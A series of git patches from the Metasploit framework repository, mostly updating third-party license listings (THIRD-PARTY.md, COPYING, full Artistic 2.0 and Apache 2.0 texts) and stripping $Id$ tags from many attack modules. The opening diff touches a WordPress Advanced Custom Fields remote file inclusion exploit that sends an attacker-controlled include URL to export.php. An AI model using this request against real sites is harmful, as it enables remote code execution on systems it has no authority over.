uri << '/' if uri[-1,1] != '/' - - plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php" + uri << datastore['PLUGINSPATH'] + uri << '/' if uri[-1,1] != '/' print_status('Sending request') res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}#{plugin_path}", + 'uri' => "#{uri}advanced-custom-fields/core/actions/export.php", 'data' => "acf_abspath=#{php_include_url}" }) - if res and res.code != 200 + if res and res.body =~ /allow_url_include/ + fail_with(Exploit::Failure::NotVulnerable, 'allow_url_include is disabled') + elsif res.code != 200 fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end - handler - end end From b78d565379dc29073cc72fc3788331aff1b6be9f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 2 Jan 2013 15:22:32 -0600 Subject: [PATCH 127/154] More touchups on THIRD-PARTY.md Adding missing copyright statements on included gems. Thanks to @bturner-r7 for noticing. --- THIRD-PARTY.md | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/THIRD-PARTY.md b/THIRD-PARTY.md index fa98c50920..1466bf29f6 100644 --- a/THIRD-PARTY.md +++ b/THIRD-PARTY.md @@ -21,6 +21,7 @@ Ruby - FastLib located at lib/fastlib.rb Copyright (C) 2011 Rapid7 - Gem components located under lib/gemcache/ + * mime-types - Copyright (C) Austin Ziegler * rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers. Portions (c) 2007-2011 Eric Hodel. Portions copyright others, see individual files for details. @@ -997,28 +998,37 @@ MIT * activerecord - Copyright (c) 2004-2011 David Heinemeier Hansson * activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson * activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson + * acts_as_list - Copyright (c) 2007 David Heinemeier Hansson + * arel- Copyright (c) 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson * authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic * builder - Copyright (c) 2003-2012 Jim Weirich (jim.weirich@gmail.com) * carrierwave - Copyright (c) 2008-2012 Jonas Nicklas * chunky_png - Copyright (c) 2010 Willem van Bergen * coderay - By Rob Aldred * daemons - Copyright (c) 2005-2012 Thomas Uehlinger - * diff-lcs - Copyright 2004–2011 Austin Ziegler + * diff-lcs - Copyright 2004-2011 Austin Ziegler + * erubis - copyright(c) 2006-2011 kuwata-lab.com all rights reserved. * formtastic - Copyright (c) 2008-2010 Justin French * fssm - Copyright (c) 2011 Travis Tilley * hike - Copyright (c) 2011 Sam Stephenson * i18n - Copyright (c) 2008 The Ruby I18n team + * ice_cube - Copyright (c) 2010-2012 John Crepezzi * journey - Copyright (c) 2011 Aaron Patterson * jquery-rails - Copyright (c) 2010 Andre Arko * liquid - Copyright (c) 2005, 2006 Tobias Luetke - * metasploit_data_models - Copyright (C) 2012, Rapid7, Inc. + * mail - Copyright (c) 2009, 2010, 2011, 2012 Mikel Lindsaar + * metasploit_data_models - Copyright (c) 2012, Rapid7, Inc. * method_source - Copyright (c) 2011 John Mair (banisterfiend) * multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. + * polyglot - Copyright (c) 2007 Clifford Heath + * prototype_legacy_helper - No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper) * rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen * rack-cache - Copyright (c) 2008 Ryan Tomayko * rack-ssl - Copyright (c) 2010 Joshua Peek + * rack-test - Copyright (c) 2008-2009 Bryan Helmkamp, Engine Yard Inc. * railties - No copyright statement provided * rake - Copyright (c) 2003, 2004 Jim Weirich + * robots - Copyright (c) 2008 Kyle Maxwell, contributors * slop - Copyright (c) 2012 Lee Jarvis * spork - Copyright (c) 2009 Tim Harper * sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek From d74490a6d53a3cf99073dc353b78de3cba409b05 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 2 Jan 2013 15:29:10 -0600 Subject: [PATCH 128/154] Updating COPYING with new year I am pretty sure this is incorrect, but at least it should be consistent with the calendar if it's going to be incorrect. --- COPYING | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/COPYING b/COPYING index ff03baf5f5..149b3b7611 100644 --- a/COPYING +++ b/COPYING @@ -1,4 +1,4 @@ -Copyright (C) 2006-2012, Rapid7 Inc. +Copyright (C) 2006-2013, Rapid7 Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification, From f4e9e83e48da681673206ef4767ba1a25b346f0c Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 2 Jan 2013 16:56:56 -0600 Subject: [PATCH 129/154] Add nokogiri and thin --- THIRD-PARTY.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/THIRD-PARTY.md b/THIRD-PARTY.md index 1466bf29f6..2575d459d2 100644 --- a/THIRD-PARTY.md +++ b/THIRD-PARTY.md @@ -28,6 +28,7 @@ Ruby * eventmachine - Copyright (C) 2006-07 by Francis Cianfrocca * json - Copyright Daniel Luz * pg - Copyright (c) 1997-2012 by the authors + * thin - Copyright (c) Marc-Andre Cournoyer @@ -1020,6 +1021,7 @@ MIT * metasploit_data_models - Copyright (c) 2012, Rapid7, Inc. * method_source - Copyright (c) 2011 John Mair (banisterfiend) * multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. + * nokogiri - Copyright (c) 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada * polyglot - Copyright (c) 2007 Clifford Heath * prototype_legacy_helper - No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper) * rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen From 758edd7aed2eb787eb9861ffb7cf818ec2994709 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 3 Jan 2013 00:02:03 +0100 Subject: [PATCH 130/154] make msftidy happy --- .../unix/webapp/wp_advanced_custom_fields_exec.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index d81df24206..95acc30dfe 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -17,11 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion', 'Description' => %q{ - This module exploits a remote file inclusion flaw in the WordPress - blogging software plugin known as Advanced Custom Fields. The vulnerability allows for - remote file inclusion and remote code execution via the export.php script. The - Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit - only works when the php option allow_url_include is set to On(Default Off). + This module exploits a remote file inclusion flaw in the WordPress blogging + software plugin known as Advanced Custom Fields. The vulnerability allows for remote + file inclusion and remote code execution via the export.php script. The Advanced + Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only + works when the php option allow_url_include is set to On (Default Off). }, 'Author' => [ From 554823446937a2b71709ac126cad8706faace75d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 2 Jan 2013 17:04:18 -0600 Subject: [PATCH 131/154] Adding msgpack, windows gems, with new licenses Included Apache and Artistic license texts. --- THIRD-PARTY.md | 370 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 370 insertions(+) diff --git a/THIRD-PARTY.md b/THIRD-PARTY.md index 2575d459d2..4bc94310c2 100644 --- a/THIRD-PARTY.md +++ b/THIRD-PARTY.md @@ -1101,3 +1101,373 @@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ```` + +Artistic 2.0 +============ + + - Gem components located under lib/gemcache/ + * win32-api - Copyright (c) 2003-2011, Daniel J. Berger + * win32-service - Copyright (c) 2003-2011, Daniel J. Berger + * windows-api - Copyright (c) 2003-2011, Daniel J. Berger + * windows-pr - Copyright (c) 2003-2011, Daniel J. Berger + +```` + +Artistic License 2.0 Copyright (c) 2000-2006, The Perl Foundation. + +Everyone is permitted to copy and distribute verbatim copies of this license +document, but changing it is not allowed. + +Preamble This license establishes the terms under which a given free software +Package may be copied, modified, distributed, and/or redistributed. The intent +is that the Copyright Holder maintains some artistic control over the +development of that Package while still keeping the Package available as open +source and free software. + +You are always permitted to make arrangements wholly outside of this license +directly with the Copyright Holder of a given Package. If the terms of this +license do not permit the full use that you propose to make of the Package, you +should contact the Copyright Holder and seek a different licensing arrangement. + +Definitions "Copyright Holder" means the individual(s) or organization(s) named +in the copyright notice for the entire Package. + +"Contributor" means any party that has contributed code or other material to +the Package, in accordance with the Copyright Holder's procedures. + +"You" and "your" means any person who would like to copy, distribute, or modify +the Package. + +"Package" means the collection of files distributed by the Copyright Holder, +and derivatives of that collection and/or of those files. A given Package may +consist of either the Standard Version, or a Modified Version. + +"Distribute" means providing a copy of the Package or making it accessible to +anyone else, or in the case of a company or organization, to others outside of +your company or organization. + +"Distributor Fee" means any fee that you charge for Distributing this Package +or providing support for this Package to another party. It does not mean +licensing fees. + +"Standard Version" refers to the Package if it has not been modified, or has +been modified only in ways explicitly requested by the Copyright Holder. + +"Modified Version" means the Package, if it has been changed, and such changes +were not explicitly requested by the Copyright Holder. + +"Original License" means this Artistic License as Distributed with the Standard +Version of the Package, in its current version or as it may be modified by The +Perl Foundation in the future. + +"Source" form means the source code, documentation source, and configuration +files for the Package. + +"Compiled" form means the compiled bytecode, object code, binary, or any other +form resulting from mechanical transformation or translation of the Source +form. + +Permission for Use and Modification Without Distribution (1) You are permitted +to use the Standard Version and create and use Modified Versions for any +purpose without restriction, provided that you do not Distribute the Modified +Version. + +Permissions for Redistribution of the Standard Version (2) You may Distribute +verbatim copies of the Source form of the Standard Version of this Package in +any medium without restriction, either gratis or for a Distributor Fee, +provided that you duplicate all of the original copyright notices and +associated disclaimers. At your discretion, such verbatim copies may or may not +include a Compiled form of the Package. + +(3) You may apply any bug fixes, portability changes, and other modifications +made available from the Copyright Holder. The resulting Package will still be +considered the Standard Version, and as such will be subject to the Original +License. + +Distribution of Modified Versions of the Package as Source (4) You may +Distribute your Modified Version as Source (either gratis or for a Distributor +Fee, and with or without a Compiled form of the Modified Version) provided that +you clearly document how it differs from the Standard Version, including, but +not limited to, documenting any non-standard features, executables, or modules, +and provided that you do at least ONE of the following: + +(a) make the Modified Version available to the Copyright Holder of the Standard +Version, under the Original License, so that the Copyright Holder may include +your modifications in the Standard Version. (b) ensure that installation of +your Modified Version does not prevent the user installing or running the +Standard Version. In addition, the Modified Version must bear a name that is +different from the name of the Standard Version. (c) allow anyone who receives +a copy of the Modified Version to make the Source form of the Modified Version +available to others under (i) the Original License or (ii) a license that +permits the licensee to freely copy, modify and redistribute the Modified +Version using the same licensing terms that apply to the copy that the licensee +received, and requires that the Source form of the Modified Version, and of any +works derived from it, be made freely available in that license fees are +prohibited but Distributor Fees are allowed. + +Distribution of Compiled Forms of the Standard Version or Modified Versions +without the Source (5) You may Distribute Compiled forms of the Standard +Version without the Source, provided that you include complete instructions on +how to get the Source of the Standard Version. Such instructions must be valid +at the time of your distribution. If these instructions, at any time while you +are carrying out such distribution, become invalid, you must provide new +instructions on demand or cease further distribution. If you provide valid +instructions or cease distribution within thirty days after you become aware +that the instructions are invalid, then you do not forfeit any of your rights +under this license. + +(6) You may Distribute a Modified Version in Compiled form without the Source, +provided that you comply with Section 4 with respect to the Source of the +Modified Version. + +Aggregating or Linking the Package (7) You may aggregate the Package (either +the Standard Version or Modified Version) with other packages and Distribute +the resulting aggregation provided that you do not charge a licensing fee for +the Package. Distributor Fees are permitted, and licensing fees for other +components in the aggregation are permitted. The terms of this license apply to +the use and Distribution of the Standard or Modified Versions as included in +the aggregation. + +(8) You are permitted to link Modified and Standard Versions with other works, +to embed the Package in a larger work of your own, or to build stand-alone +binary or bytecode versions of applications that include the Package, and +Distribute the result without restriction, provided the result does not expose +a direct interface to the Package. + +Items That are Not Considered Part of a Modified Version (9) Works (including, +but not limited to, modules and scripts) that merely extend or make use of the +Package, do not, by themselves, cause the Package to be a Modified Version. In +addition, such works are not considered parts of the Package itself, and are +not subject to the terms of this license. + +General Provisions (10) Any use, modification, and distribution of the Standard +or Modified Versions is governed by this Artistic License. By using, modifying +or distributing the Package, you accept this license. Do not use, modify, or +distribute the Package, if you do not accept this license. + +(11) If your Modified Version has been derived from a Modified Version made by +someone other than you, you are nevertheless required to ensure that your +Modified Version complies with the requirements of this license. + +(12) This license does not grant you the right to use any trademark, service +mark, tradename, or logo of the Copyright Holder. + +(13) This license includes the non-exclusive, worldwide, free-of-charge patent +license to make, have made, use, offer to sell, sell, import and otherwise +transfer the Package with respect to any patent claims licensable by the +Copyright Holder that are necessarily infringed by the Package. If you +institute patent litigation (including a cross-claim or counterclaim) against +any party alleging that the Package constitutes direct or contributory patent +infringement, then this Artistic License to you shall terminate on the date +that such litigation is filed. + +(14) Disclaimer of Warranty: THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER +AND CONTRIBUTORS "AS IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE +IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR +NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL LAW. +UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL BE LIABLE FOR +ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY +OUT OF THE USE OF THE PACKAGE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH +DAMAGE. + +```` + +Apache 2.0 +========== + + - Gem components located under lib/gemcache/ + * Msgpack - Copyright (c) 2008-2010 FURUHASHI Sadayuki + +```` + +Apache License +Version 2.0, January 2004 +http://www.apache.org/licenses/ + +TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + +1. Definitions. + +"License" shall mean the terms and conditions for use, reproduction, and +distribution as defined by Sections 1 through 9 of this document. + +"Licensor" shall mean the copyright owner or entity authorized by the copyright +owner that is granting the License. + +"Legal Entity" shall mean the union of the acting entity and all other entities +that control, are controlled by, or are under common control with that entity. +For the purposes of this definition, "control" means (i) the power, direct or +indirect, to cause the direction or management of such entity, whether by +contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the +outstanding shares, or (iii) beneficial ownership of such entity. + +"You" (or "Your") shall mean an individual or Legal Entity exercising +permissions granted by this License. + +"Source" form shall mean the preferred form for making modifications, including +but not limited to software source code, documentation source, and +configuration files. + +"Object" form shall mean any form resulting from mechanical transformation or +translation of a Source form, including but not limited to compiled object +code, generated documentation, and conversions to other media types. + +"Work" shall mean the work of authorship, whether in Source or Object form, +made available under the License, as indicated by a copyright notice that is +included in or attached to the work (an example is provided in the Appendix +below). + +"Derivative Works" shall mean any work, whether in Source or Object form, that +is based on (or derived from) the Work and for which the editorial revisions, +annotations, elaborations, or other modifications represent, as a whole, an +original work of authorship. For the purposes of this License, Derivative Works +shall not include works that remain separable from, or merely link (or bind by +name) to the interfaces of, the Work and Derivative Works thereof. + +"Contribution" shall mean any work of authorship, including the original +version of the Work and any modifications or additions to that Work or +Derivative Works thereof, that is intentionally submitted to Licensor for +inclusion in the Work by the copyright owner or by an individual or Legal +Entity authorized to submit on behalf of the copyright owner. For the purposes +of this definition, "submitted" means any form of electronic, verbal, or +written communication sent to the Licensor or its representatives, including +but not limited to communication on electronic mailing lists, source code +control systems, and issue tracking systems that are managed by, or on behalf +of, the Licensor for the purpose of discussing and improving the Work, but +excluding communication that is conspicuously marked or otherwise designated in +writing by the copyright owner as "Not a Contribution." + +"Contributor" shall mean Licensor and any individual or Legal Entity on behalf +of whom a Contribution has been received by Licensor and subsequently +incorporated within the Work. + +2. Grant of Copyright License. + +Subject to the terms and conditions of this License, each Contributor hereby +grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, +irrevocable copyright license to reproduce, prepare Derivative Works of, +publicly display, publicly perform, sublicense, and distribute the Work and +such Derivative Works in Source or Object form. + +3. Grant of Patent License. + +Subject to the terms and conditions of this License, each Contributor hereby +grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, +irrevocable (except as stated in this section) patent license to make, have +made, use, offer to sell, sell, import, and otherwise transfer the Work, where +such license applies only to those patent claims licensable by such Contributor +that are necessarily infringed by their Contribution(s) alone or by combination +of their Contribution(s) with the Work to which such Contribution(s) was +submitted. If You institute patent litigation against any entity (including a +cross-claim or counterclaim in a lawsuit) alleging that the Work or a +Contribution incorporated within the Work constitutes direct or contributory +patent infringement, then any patent licenses granted to You under this License +for that Work shall terminate as of the date such litigation is filed. + +4. Redistribution. + +You may reproduce and distribute copies of the Work or Derivative Works thereof +in any medium, with or without modifications, and in Source or Object form, +provided that You meet the following conditions: + +You must give any other recipients of the Work or Derivative Works a copy of +this License; and You must cause any modified files to carry prominent notices +stating that You changed the files; and You must retain, in the Source form of +any Derivative Works that You distribute, all copyright, patent, trademark, and +attribution notices from the Source form of the Work, excluding those notices +that do not pertain to any part of the Derivative Works; and If the Work +includes a "NOTICE" text file as part of its distribution, then any Derivative +Works that You distribute must include a readable copy of the attribution +notices contained within such NOTICE file, excluding those notices that do not +pertain to any part of the Derivative Works, in at least one of the following +places: within a NOTICE text file distributed as part of the Derivative Works; +within the Source form or documentation, if provided along with the Derivative +Works; or, within a display generated by the Derivative Works, if and wherever +such third-party notices normally appear. The contents of the NOTICE file are +for informational purposes only and do not modify the License. You may add Your +own attribution notices within Derivative Works that You distribute, alongside +or as an addendum to the NOTICE text from the Work, provided that such +additional attribution notices cannot be construed as modifying the License. +You may add Your own copyright statement to Your modifications and may provide +additional or different license terms and conditions for use, reproduction, or +distribution of Your modifications, or for any such Derivative Works as a +whole, provided Your use, reproduction, and distribution of the Work otherwise +complies with the conditions stated in this License. + +5. Submission of Contributions. + +Unless You explicitly state otherwise, any Contribution intentionally submitted +for inclusion in the Work by You to the Licensor shall be under the terms and +conditions of this License, without any additional terms or conditions. +Notwithstanding the above, nothing herein shall supersede or modify the terms +of any separate license agreement you may have executed with Licensor regarding +such Contributions. + +6. Trademarks. + +This License does not grant permission to use the trade names, trademarks, +service marks, or product names of the Licensor, except as required for +reasonable and customary use in describing the origin of the Work and +reproducing the content of the NOTICE file. + +7. Disclaimer of Warranty. + +Unless required by applicable law or agreed to in writing, Licensor provides +the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, +including, without limitation, any warranties or conditions of TITLE, +NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are +solely responsible for determining the appropriateness of using or +redistributing the Work and assume any risks associated with Your exercise of +permissions under this License. + +8. Limitation of Liability. + +In no event and under no legal theory, whether in tort (including negligence), +contract, or otherwise, unless required by applicable law (such as deliberate +and grossly negligent acts) or agreed to in writing, shall any Contributor be +liable to You for damages, including any direct, indirect, special, incidental, +or consequential damages of any character arising as a result of this License +or out of the use or inability to use the Work (including but not limited to +damages for loss of goodwill, work stoppage, computer failure or malfunction, +or any and all other commercial damages or losses), even if such Contributor +has been advised of the possibility of such damages. + +9. Accepting Warranty or Additional Liability. + +While redistributing the Work or Derivative Works thereof, You may choose to +offer, and charge a fee for, acceptance of support, warranty, indemnity, or +other liability obligations and/or rights consistent with this License. +However, in accepting such obligations, You may act only on Your own behalf and +on Your sole responsibility, not on behalf of any other Contributor, and only +if You agree to indemnify, defend, and hold each Contributor harmless for any +liability incurred by, or claims asserted against, such Contributor by reason +of your accepting any such warranty or additional liability. + +END OF TERMS AND CONDITIONS + +APPENDIX: How to apply the Apache License to your work + +To apply the Apache License to your work, attach the following boilerplate +notice, with the fields enclosed by brackets "[]" replaced with your own +identifying information. (Don't include the brackets!) The text should be +enclosed in the appropriate comment syntax for the file format. We also +recommend that a file or class name and description of purpose be included on +the same "printed page" as the copyright notice for easier identification +within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); you may not +use this file except in compliance with the License. You may obtain a copy of +the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, WITHOUT +WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the +License for the specific language governing permissions and limitations under +the License. + +```` From ca890369b1a5f1207624427d214f2e8bf7f0a617 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 3 Jan 2013 00:54:47 +0100 Subject: [PATCH 132/154] msftidy: remove $Id$ --- modules/auxiliary/admin/2wire/xslt_password_reset.rb | 4 ---- modules/auxiliary/admin/backupexec/dump.rb | 4 ---- modules/auxiliary/admin/backupexec/registry.rb | 4 ---- modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb | 4 ---- modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb | 4 ---- modules/auxiliary/admin/db2/db2rcmd.rb | 4 ---- modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb | 4 ---- modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb | 4 ---- modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb | 4 ---- modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb | 4 ---- modules/auxiliary/admin/http/contentkeeper_fileaccess.rb | 4 ---- modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb | 4 ---- .../auxiliary/admin/http/iomega_storcenterpro_sessionid.rb | 4 ---- modules/auxiliary/admin/http/tomcat_administration.rb | 4 ---- modules/auxiliary/admin/http/tomcat_utf8_traversal.rb | 4 ---- modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb | 4 ---- modules/auxiliary/admin/http/typo3_sa_2009_001.rb | 4 ---- modules/auxiliary/admin/http/typo3_sa_2009_002.rb | 4 ---- modules/auxiliary/admin/http/typo3_sa_2010_020.rb | 4 ---- .../auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb | 4 ---- modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb | 4 ---- modules/auxiliary/admin/motorola/wr850g_cred.rb | 4 ---- modules/auxiliary/admin/ms/ms08_059_his2006.rb | 4 ---- modules/auxiliary/admin/mssql/mssql_enum.rb | 4 ---- modules/auxiliary/admin/mssql/mssql_exec.rb | 4 ---- modules/auxiliary/admin/mssql/mssql_idf.rb | 4 ---- modules/auxiliary/admin/mssql/mssql_sql.rb | 4 ---- modules/auxiliary/admin/mysql/mysql_enum.rb | 4 ---- modules/auxiliary/admin/mysql/mysql_sql.rb | 4 ---- modules/auxiliary/admin/officescan/tmlisten_traversal.rb | 4 ---- modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb | 4 ---- modules/auxiliary/admin/oracle/oracle_login.rb | 4 ---- modules/auxiliary/admin/oracle/oracle_sql.rb | 4 ---- modules/auxiliary/admin/oracle/oraenum.rb | 4 ---- modules/auxiliary/admin/oracle/osb_execqr.rb | 4 ---- modules/auxiliary/admin/oracle/osb_execqr2.rb | 4 ---- modules/auxiliary/admin/oracle/osb_execqr3.rb | 4 ---- modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb | 4 ---- .../auxiliary/admin/oracle/post_exploitation/win32upload.rb | 4 ---- modules/auxiliary/admin/oracle/sid_brute.rb | 4 ---- modules/auxiliary/admin/oracle/tnscmd.rb | 4 ---- modules/auxiliary/admin/pop2/uw_fileretrieval.rb | 4 ---- modules/auxiliary/admin/postgres/postgres_readfile.rb | 4 ---- modules/auxiliary/admin/postgres/postgres_sql.rb | 4 ---- modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb | 4 ---- modules/auxiliary/admin/scada/igss_exec_17.rb | 4 ---- modules/auxiliary/admin/serverprotect/file.rb | 4 ---- modules/auxiliary/admin/smb/check_dir_file.rb | 4 ---- modules/auxiliary/admin/smb/list_directory.rb | 4 ---- modules/auxiliary/admin/smb/samba_symlink_traversal.rb | 4 ---- modules/auxiliary/admin/smb/upload_file.rb | 4 ---- modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb | 4 ---- modules/auxiliary/admin/tikiwiki/tikidblib.rb | 4 ---- modules/auxiliary/admin/vmware/poweroff_vm.rb | 4 ---- modules/auxiliary/admin/vmware/poweron_vm.rb | 4 ---- modules/auxiliary/admin/vmware/tag_vm.rb | 4 ---- modules/auxiliary/admin/vmware/terminate_esx_sessions.rb | 4 ---- modules/auxiliary/admin/vnc/realvnc_41_bypass.rb | 4 ---- .../auxiliary/admin/vxworks/apple_airport_extreme_password.rb | 4 ---- modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb | 4 ---- modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb | 4 ---- modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb | 4 ---- modules/auxiliary/admin/webmin/file_disclosure.rb | 4 ---- modules/auxiliary/admin/zend/java_bridge.rb | 4 ---- modules/auxiliary/analyze/jtr_aix.rb | 4 ---- modules/auxiliary/analyze/jtr_crack_fast.rb | 4 ---- modules/auxiliary/analyze/jtr_linux.rb | 4 ---- modules/auxiliary/analyze/jtr_mssql_fast.rb | 4 ---- modules/auxiliary/analyze/jtr_mysql_fast.rb | 4 ---- modules/auxiliary/analyze/jtr_oracle_fast.rb | 4 ---- modules/auxiliary/analyze/jtr_unshadow.rb | 4 ---- modules/auxiliary/analyze/postgres_md5_crack.rb | 4 ---- modules/auxiliary/client/smtp/emailer.rb | 4 ---- modules/auxiliary/dos/cisco/ios_http_percentpercent.rb | 4 ---- modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb | 4 ---- modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb | 4 ---- modules/auxiliary/dos/hp/data_protector_rds.rb | 4 ---- modules/auxiliary/dos/http/3com_superstack_switch.rb | 4 ---- modules/auxiliary/dos/http/apache_mod_isapi.rb | 4 ---- modules/auxiliary/dos/http/apache_range_dos.rb | 4 ---- modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb | 4 ---- modules/auxiliary/dos/http/dell_openmanage_post.rb | 4 ---- modules/auxiliary/dos/http/sonicwall_ssl_format.rb | 4 ---- modules/auxiliary/dos/http/webrick_regex.rb | 4 ---- modules/auxiliary/dos/mdns/avahi_portzero.rb | 4 ---- modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb | 4 ---- modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb | 4 ---- modules/auxiliary/dos/samba/lsa_addprivs_heap.rb | 4 ---- modules/auxiliary/dos/samba/lsa_transnames_heap.rb | 4 ---- modules/auxiliary/dos/scada/beckhoff_twincat.rb | 4 ---- modules/auxiliary/dos/smtp/sendmail_prescan.rb | 4 ---- modules/auxiliary/dos/solaris/lpd/cascade_delete.rb | 4 ---- modules/auxiliary/dos/ssl/dtls_changecipherspec.rb | 4 ---- modules/auxiliary/dos/syslog/rsyslog_long_tag.rb | 4 ---- modules/auxiliary/dos/tcp/junos_tcp_opt.rb | 4 ---- modules/auxiliary/dos/tcp/synflood.rb | 4 ---- modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb | 4 ---- modules/auxiliary/dos/wifi/cts_rts_flood.rb | 4 ---- modules/auxiliary/dos/wifi/deauth.rb | 4 ---- modules/auxiliary/dos/wifi/fakeap.rb | 4 ---- modules/auxiliary/dos/wifi/file2air.rb | 4 ---- modules/auxiliary/dos/wifi/netgear_ma521_rates.rb | 4 ---- modules/auxiliary/dos/wifi/netgear_wg311pci.rb | 4 ---- modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb | 4 ---- modules/auxiliary/dos/wifi/ssidlist_beacon.rb | 4 ---- modules/auxiliary/dos/wifi/wifun.rb | 4 ---- modules/auxiliary/dos/windows/appian/appian_bpm.rb | 4 ---- modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb | 4 ---- modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb | 4 ---- modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb | 4 ---- modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb | 4 ---- modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb | 4 ---- modules/auxiliary/dos/windows/ftp/solarftp_user.rb | 4 ---- modules/auxiliary/dos/windows/ftp/titan626_site.rb | 4 ---- modules/auxiliary/dos/windows/ftp/vicftps50_list.rb | 4 ---- modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb | 4 ---- modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb | 4 ---- modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb | 4 ---- modules/auxiliary/dos/windows/games/kaillera.rb | 4 ---- modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb | 4 ---- modules/auxiliary/dos/windows/http/pi3web_isapi.rb | 4 ---- modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb | 4 ---- modules/auxiliary/dos/windows/nat/nat_helper.rb | 4 ---- modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb | 4 ---- modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb | 4 ---- modules/auxiliary/dos/windows/smb/ms06_063_trans.rb | 4 ---- modules/auxiliary/dos/windows/smb/ms09_001_write.rb | 4 ---- 